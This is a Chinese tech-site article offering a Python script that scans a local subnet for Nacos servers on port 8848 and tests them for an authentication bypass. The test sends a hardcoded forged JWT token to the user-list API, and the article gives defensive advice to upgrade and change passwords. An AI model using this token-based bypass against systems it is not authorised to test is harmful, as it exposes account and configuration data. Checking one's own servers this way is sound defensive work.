0
  • 聊天消息
  • 系統(tǒng)消息
  • 評(píng)論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會(huì)員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識(shí)你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

基于python的漏洞掃描器

jf_TEuU2tls ? 來(lái)源:浩道linux ? 2023-08-07 09:27 ? 次閱讀

官方確認(rèn),低版本的nacos服務(wù)管理平臺(tái)存在多個(gè)安全漏洞。這些漏洞可能導(dǎo)致配置文件中的敏感信息泄漏或系統(tǒng)被入侵的風(fēng)險(xiǎn)。

今天浩道跟大家分享一個(gè)python腳本,主要用于自動(dòng)檢測(cè)某網(wǎng)段內(nèi)主機(jī)上可能存在的nacos漏洞,可以方便大家對(duì)某網(wǎng)段內(nèi)多臺(tái)主機(jī)進(jìn)行檢測(cè),一起看看吧!

如存在漏洞,建議及時(shí)升級(jí)nacos服務(wù)管理平臺(tái)的版本,并修改默認(rèn)密碼,刪除多余管理賬號(hào)。

nacos.py腳本信息如下,大家可以根據(jù)自己實(shí)際網(wǎng)段修改對(duì)應(yīng)代碼即可。該腳本實(shí)現(xiàn)掃描的是192.168.100.0網(wǎng)段內(nèi)主機(jī)上的nacos漏洞。

import requests
import urllib3
import threading
import socket


urllib3.disable_warnings()


# 定義自定義路徑和Header
custom_path = '/nacos/v1/auth/users?pageNo=1&pageSize=2'
header = {
    "User-Agent": "Nacos-Server",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Authorization": "Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Connection": "close",
    "Upgrade-Insecure-Requests": "1",
    "Sec-Fetch-Dest": "document",
    "Sec-Fetch-Mode": "navigate",
    "Sec-Fetch-Site": "same-origin",
    "Pragma": "no-cache",
    "Te": "trailers",
    "Cache-Control": "no-cache",
}


# 定義函數(shù),用于發(fā)起GET請(qǐng)求并判斷回顯結(jié)果,每次調(diào)用這個(gè)函數(shù)發(fā)送一個(gè)請(qǐng)求
def send_request(url):
    full_url = url + custom_path  # 拼接完整URL
    try:
        response = requests.get(full_url, headers=header, verify=False, timeout=2)
        if response.status_code == 200 and response.content.find(b"pageNumber") != -1:
            print(f'{url} 存在nacos身份驗(yàn)證繞過(guò)漏洞')
        else:
            print(f'{url} 不存在nacos身份驗(yàn)證繞過(guò)漏洞')
    except requests.exceptions.RequestException as e:
        print(f'{url} 訪問(wèn)失敗 {e}')


# Function to check if port 8848 is open on a given IP address
def is_port_open(ip, port):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(2)  # Set a timeout of 2 seconds for the connection attempt
    result = sock.connect_ex((ip, port))
    sock.close()
    return result == 0


# Scan the 192.168.100.1 network segment for hosts with port 8848 open
nacos_hosts = []
for i in range(1, 256):
    ip_address = f'192.168.100.{i}'
    if is_port_open(ip_address, 8848):
        nacos_hosts.append(ip_address)


# Perform Nacos vulnerability check for hosts with port 8848 open
if not nacos_hosts:
    print("No Nacos server found on port 8848 in the 192.168.100.1 network segment.")
else:
    print(f"Found Nacos server(s) on port 8848: {', '.join(nacos_hosts)}")
    threads = []
    for host in nacos_hosts:
        t = threading.Thread(target=send_request, args=(f"http://{host}:8848",))
        threads.append(t)
        t.start()


    # Wait for all threads to complete
    for t in threads:
        t.join()

以下針對(duì)三個(gè)網(wǎng)段執(zhí)行腳本,如下圖所示:

bc369b98-34b4-11ee-9e74-dac502259ad0.png

bc5de446-34b4-11ee-9e74-dac502259ad0.png

bc7abef4-34b4-11ee-9e74-dac502259ad0.png

責(zé)任編輯:彭菁

聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場(chǎng)。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問(wèn)題,請(qǐng)聯(lián)系本站處理。 舉報(bào)投訴
  • 文件
    +關(guān)注

    關(guān)注

    1

    文章

    569

    瀏覽量

    24775
  • 代碼
    +關(guān)注

    關(guān)注

    30

    文章

    4808

    瀏覽量

    68808
  • 漏洞
    +關(guān)注

    關(guān)注

    0

    文章

    204

    瀏覽量

    15400
  • python
    +關(guān)注

    關(guān)注

    56

    文章

    4801

    瀏覽量

    84855
  • 掃描器
    +關(guān)注

    關(guān)注

    0

    文章

    170

    瀏覽量

    11936

原文標(biāo)題:【python實(shí)戰(zhàn)腳本分享】自動(dòng)檢測(cè)nacos漏洞!

文章出處:【微信號(hào):浩道linux,微信公眾號(hào):浩道linux】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。

收藏 人收藏

    評(píng)論

    相關(guān)推薦

    用作掃描器的光電隔離電路

    用作掃描器的光電隔離電路
    發(fā)表于 12-23 17:38 ?717次閱讀
    用作<b class='flag-5'>掃描器</b>的光電隔離電路

    飛點(diǎn)掃描器掃描報(bào)警電路圖

    飛點(diǎn)掃描器掃描報(bào)警電路圖
    發(fā)表于 06-29 13:10 ?544次閱讀
    飛點(diǎn)<b class='flag-5'>掃描器</b>的<b class='flag-5'>掃描</b>報(bào)警電路圖

    HR3220的無(wú)線掃描器用戶手冊(cè)

    本手冊(cè)主要向用戶介紹NLS-HR3220系列無(wú)線式二維條碼掃描器(以下簡(jiǎn)稱HR32無(wú)線掃描器掃描器)的使用方法。
    發(fā)表于 09-20 18:49 ?12次下載

    干貨:基于指紋識(shí)別的漏洞掃描設(shè)計(jì)方案

    漏洞掃描器大家都不陌生,幾乎是每家公司必備的安全產(chǎn)品。幾乎早在快10年前,作為安全乙方,就需要扛著一臺(tái)極光掃描器,到全國(guó)各地去做各種安服。在當(dāng)時(shí)極光掃描器就是一款非常成熟的商業(yè)產(chǎn)品了,
    的頭像 發(fā)表于 07-07 11:46 ?3703次閱讀
    干貨:基于指紋識(shí)別的<b class='flag-5'>漏洞</b><b class='flag-5'>掃描</b>設(shè)計(jì)方案

    XSS漏洞掃描器工具

    XSpear是一款基于RubyGems的的XSS漏洞掃描器。擁有常見(jiàn)的XSS漏洞掃描攻擊測(cè)試功能。還可進(jìn)行參數(shù)分析。
    的頭像 發(fā)表于 01-17 09:28 ?1903次閱讀

    市場(chǎng)上可用的十大最佳漏洞掃描工具

    OpenVAS漏洞掃描器是一種漏洞分析工具,由于其全面的特性,可以使用它來(lái)掃描服務(wù)和網(wǎng)絡(luò)設(shè)備。這些掃描
    的頭像 發(fā)表于 03-08 09:49 ?4238次閱讀

    NanoBeacon? BLE掃描器教程

    到目前為止,我們已經(jīng)發(fā)布了三個(gè)關(guān)于使用我們新的NanoBeacon? BLE掃描器移動(dòng)應(yīng)用程序的教程。
    的頭像 發(fā)表于 06-02 14:35 ?665次閱讀
    NanoBeacon? BLE<b class='flag-5'>掃描器</b>教程

    Android Things I2C地址掃描器

    電子發(fā)燒友網(wǎng)站提供《Android Things I2C地址掃描器.zip》資料免費(fèi)下載
    發(fā)表于 06-13 17:02 ?0次下載
    Android Things I2C地址<b class='flag-5'>掃描器</b>

    紅光條碼掃描器、固定式掃描器廣泛應(yīng)用于工業(yè)制造領(lǐng)域

    隨著科技的不斷進(jìn)步,電子制造業(yè)、汽配行業(yè)、生產(chǎn)流水線等工業(yè)制造領(lǐng)域離不開紅光條碼掃描器。作為專用于掃描條碼、二維碼的掃描器,它在工業(yè)領(lǐng)域中扮演著重要的角色,因?yàn)樗鼈兛梢詭椭髽I(yè)提高生產(chǎn)效率、減少
    的頭像 發(fā)表于 05-12 16:11 ?831次閱讀
    紅光條碼<b class='flag-5'>掃描器</b>、固定式<b class='flag-5'>掃描器</b>廣泛應(yīng)用于工業(yè)制造領(lǐng)域

    一款網(wǎng)絡(luò)攝像頭漏洞掃描工具

    ? 項(xiàng)目地址:https://github.com/jorhelp/Ingram ? 簡(jiǎn)介 主要針對(duì)網(wǎng)絡(luò)攝像頭的漏洞掃描框架,目前已集成??怠⒋笕A、宇視、dlink等常見(jiàn)設(shè)備 端口掃描器 我們可以
    的頭像 發(fā)表于 06-29 09:35 ?4456次閱讀
    一款網(wǎng)絡(luò)攝像頭<b class='flag-5'>漏洞</b><b class='flag-5'>掃描</b>工具

    最常見(jiàn)的網(wǎng)絡(luò)安全12種漏洞掃描類型

    數(shù)據(jù)庫(kù)掃描技術(shù)主要用于評(píng)估數(shù)據(jù)庫(kù)系統(tǒng)的安全性,該類型會(huì)全面查找數(shù)據(jù)庫(kù)設(shè)置、訪問(wèn)控制和存儲(chǔ)數(shù)據(jù)的漏洞,比如不安全的權(quán)限、漏洞注入問(wèn)題或不安全的設(shè)置。這種掃描器需要經(jīng)常提供用于保護(hù)數(shù)據(jù)庫(kù)和
    發(fā)表于 07-12 12:41 ?1477次閱讀
    最常見(jiàn)的網(wǎng)絡(luò)安全12種<b class='flag-5'>漏洞</b><b class='flag-5'>掃描</b>類型

    網(wǎng)站常見(jiàn)漏洞checklist介紹

    在做網(wǎng)站滲透之前除了關(guān)注一些通用漏洞,這些漏洞通常能很容易的利用掃描器掃出,被WAF所防護(hù),然而有一些邏輯漏洞WAF和掃描器就無(wú)法發(fā)現(xiàn)了,就
    的頭像 發(fā)表于 10-16 09:10 ?861次閱讀
    網(wǎng)站常見(jiàn)<b class='flag-5'>漏洞</b>checklist介紹

    什么是固定式條碼掃描器?固定式掃描器怎么選?

    1.產(chǎn)品特性固定式條碼掃描器以其高度的可靠性而聞名。這種設(shè)備的設(shè)計(jì)旨在提供無(wú)與倫比的性能,無(wú)論是在高速掃描還是長(zhǎng)時(shí)間持續(xù)工作的環(huán)境下。其多種掃描模式使其能夠適應(yīng)各種不同的應(yīng)用環(huán)境,無(wú)論是需要快速
    的頭像 發(fā)表于 05-23 14:47 ?581次閱讀
    什么是固定式條碼<b class='flag-5'>掃描器</b>?固定式<b class='flag-5'>掃描器</b>怎么選?

    嵌入式條碼掃描器的幾種掃描模式

    嵌入式條碼掃描器掃描模式是指其在識(shí)別條碼時(shí)的工作模式,這些模式會(huì)影響到掃描器的使用效果和適用場(chǎng)景。以下是幾種常見(jiàn)的嵌入式條碼掃描器掃描
    的頭像 發(fā)表于 11-19 16:27 ?217次閱讀
    嵌入式條碼<b class='flag-5'>掃描器</b>的幾種<b class='flag-5'>掃描</b>模式

    工業(yè)固定式掃描器怎樣用?固定式工業(yè)條碼掃描器解決方案

    在現(xiàn)代制造業(yè)和物流領(lǐng)域,條碼掃描技術(shù)已經(jīng)成為提高效率、減少錯(cuò)誤的重要工具。工業(yè)固定式掃描器作為其中一種高效的解決方案,能夠在生產(chǎn)線、倉(cāng)儲(chǔ)和物流管理中發(fā)揮關(guān)鍵作用。本文將探討工業(yè)固定式條碼掃描器
    的頭像 發(fā)表于 12-05 15:29 ?235次閱讀
    工業(yè)固定式<b class='flag-5'>掃描器</b>怎樣用?固定式工業(yè)條碼<b class='flag-5'>掃描器</b>解決方案